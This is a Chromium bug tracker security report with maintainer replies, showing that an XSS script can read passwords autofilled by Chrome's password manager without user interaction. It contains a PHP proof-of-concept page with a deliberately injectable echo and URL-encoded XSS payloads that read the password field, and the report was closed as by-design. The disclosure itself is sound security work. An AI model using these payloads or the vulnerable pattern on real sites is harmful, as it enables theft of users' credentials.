Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 3 users
Status: WontFix
Owner: ----
Closed: Jan 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment
Security: User Password Leakage from Password Manager by XSS without User Interation
Reported by har...@gmail.com, Jan 17 2017 Back to list
VULNERABILITY DETAILS
It seems Chrome prohibit to get user's password from password manager by XSS. When a malicious script try to read password field, it will returns blank value even if it looks filled password by password manager. After user operation, such as key press or click any html elements, script can get password which is filled by password manager. 
However, when user moved to the XSSed page by using JavaScript, for example by using location.href, a malicious script can get password without any user operation.
It seems that security restriction of password manager is bypassed.
And I think this should be fixed because it is similar to below:
https://finnwea.com/blog/stealing-passwords-from-mcdonalds-users

VERSION
Chrome Version: 55.0.2883.87 m
Operating System: Windows7 SP1 and OS X 10.11.6

REPRODUCTION CASE
I put demonstration on my server: http://133.242.134.241/exploit/chrome_password_manager.php

Source of this php is below:
<body>
<?php
if(!isset($_GET{"xss"}) && !isset($_POST{"pass"})) {
?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php
}else{
?>
Please click below to fire XSS.<br>
<a href="?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27">a tag (does not work without user operation)</a><br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">location.href (works without user operation)</a>
<script>
  var a='<?php echo $_GET{"xss"} ?>';
</script>
<?php
}
?>
</body>


Best regards,
Haru 
 
Components: UI>Browser>Passwords
>It seems Chrome prohibit to get user's password from password manager by XSS.

I'm not aware of any attempt to prevent reading of an autofilled password field from JavaScript, but even if there were such a feature, it couldn't be effective. An attacker could easily use script to modify the form target and submit it, leaking the credentials.

This is similar to  Issue 659953 ; XSS attacks are inherently powerful, and theft of credentials is but one consequence of that.
Status: WontFix
Comment 3 by har...@gmail.com, Jan 18 2017
Thank you for your confirmation. I understand this is by design.
I think that chrome users who use password manager must know this risk. Could you please change permission of this ticket from Restrict to Public? 
Labels: -Restrict-View-SecurityTeam allpublic
> I'm not aware of any attempt to prevent reading of an autofilled 
> password field from JavaScript

I was mistaken. This does exist, but it's trivially circumvented. The class in question is PasswordValueGatekeeper, found in password_autofill_agent.h

The remainder of the remark is correct, however (this isn't intended or effective as a mitigation against XSS).
Issue 726309 has been merged into this issue.
Sign in to add a comment